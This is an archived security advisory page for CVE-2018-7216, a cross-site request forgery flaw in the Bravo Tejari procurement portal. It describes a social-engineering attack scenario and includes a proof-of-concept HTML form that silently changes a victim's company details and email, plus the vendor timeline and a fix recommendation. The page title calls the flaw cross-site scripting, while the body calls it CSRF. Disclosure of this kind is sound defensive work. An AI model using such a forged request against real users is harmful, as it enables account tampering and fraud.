what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Bravo Tejari Web Portal Cross Site Scripting

Bravo Tejari Web Portal Cross Site Scripting
Posted Mar 6, 2018
Authored by Arvind V.

Bravo Tejari Web Portal suffers from a cross site request forgery vulnerability.

tags | exploit, web, csrf
advisories | CVE-2018-7216
SHA-256 | 755e2c3ea76f5f03a49b9d242e4aa278dc53f0722ef3b08295e8716d9fabf6be

Bravo Tejari Web Portal Cross Site Scripting

Change Mirror Download
Exploit Title: Bravo Tejari Web Portal-CSRF
CVE-ID: CVE-2018-7216
Vulnerability Type: Cross Site Request Forgery (CSRF)
Vendor of Product: Tejari
Affected Product Code Base: Bravo Solution
Affected Component: Web Interface Management.
Attack Type: Local - Authenticated
Impact: Unauthorised Access
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind

Vulnerability Type: Cross Site Request Forgery (CSRF)
Vendor of Product: Tejari
Affected Product Code Base: Bravo Solution
Affected Component: Web Interface Management.
Attack Type: Local - Authenticated
Impact: Unauthorised Access

Product description:
Bravo Tejari is a strategic procurement platform that enables organizations
to generate more value, influence innovation and reduce risk powered by a
unique supplier-centered approach that integrates supplier lifetime value
throughout the entire procurement process

Attack Scenario:
The Web Interface of the Bravo Tejari procurement portal does not use
random tokens to block any kind of forged requests. An atacker can take
advantage of this scenario and create a forged request to edit user account
details like name, address of the company/individual, email address etc. He
then uses social engineering techniques to target specific individuals
whose account details he would like to change. He simply sends the link and
tricks the user into clicking the forged http request. The request is
executed and user account details are changed without his knowledge.

Proof of Concept Code:
Forged HTTP Request used by the attacker:

<html>
<body>
<form action="https://XXXX.XXXX.com/esop/toolkit/profile/regData.do"
method="POST">
<input type="hidden" name="userAct" value="confirmData" />
<input type="hidden" name="from" value="registration_data" />
<input type="hidden" name="actionNumber" value="0" />
<input type="hidden" name="companyExtStatusCode" value="31" />
<input type="hidden" name="companyExtStatusNote" value="" />
<input type="hidden" name="hideCompany" value="false" />
<input type="hidden" name="companyName"
value="XYZ COMPUTER SYSTEMS FZ LLC" />
<input type="hidden" name="companyAddress"
value="Dubai internet city, DUBAI" />
<input type="hidden" name="companyCity" value="DUBAI" />
<input type="hidden" name="companyCountry" value="AE" />
<input type="hidden" name="companyProvince" value="Dubai" />
<input type="hidden" name="companyZip" value="25703" />
<input type="hidden" name="companyPhone" value="43918600" />
<input type="hidden" name="companyFax" value="" />
<input type="hidden" name="companyEmail"
value="XYZ.v@XYZ.com" />
<input type="hidden" name="companyWebSite" value="" />
<input type="hidden" name="companyLegalStructure" value="" />
<input type="hidden" name="companyAddress2" value="" />
<input type="hidden" name="companyFiscalCode" value="215703" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Impact:
The affected product is a procurement portal and so all communication
regarding the contract lifecycle process is sent to user details provided
on the portal. If this vulnerability is sucessfully exploited, the attacker
will be able to change these details which will potentially affect the
victim's business.

Recommendation:
Ensure that all sensitive CRUD Operations are appropriately protected with
random tokens. Alternatively, the sensitive operations should also have an
authentication layer to confirm user verification.

References:
http://seclists.org/fulldisclosure/2018/Feb/44
https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html

https://www.securityfocus.com/archive/1/541782/30/0/threaded

Credit: Arvind Vishwakarma
http://ultimateone1.blogspot.ae/



Vulnerability Timeline:
12th December 2017 a Vulnerability Discovered
23rd December 2017 a Contacted Vendor a No Response
7th January 2018 a Contacted Vendor again a No Response
15th February 2018 a Vulnerability Disclosed


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close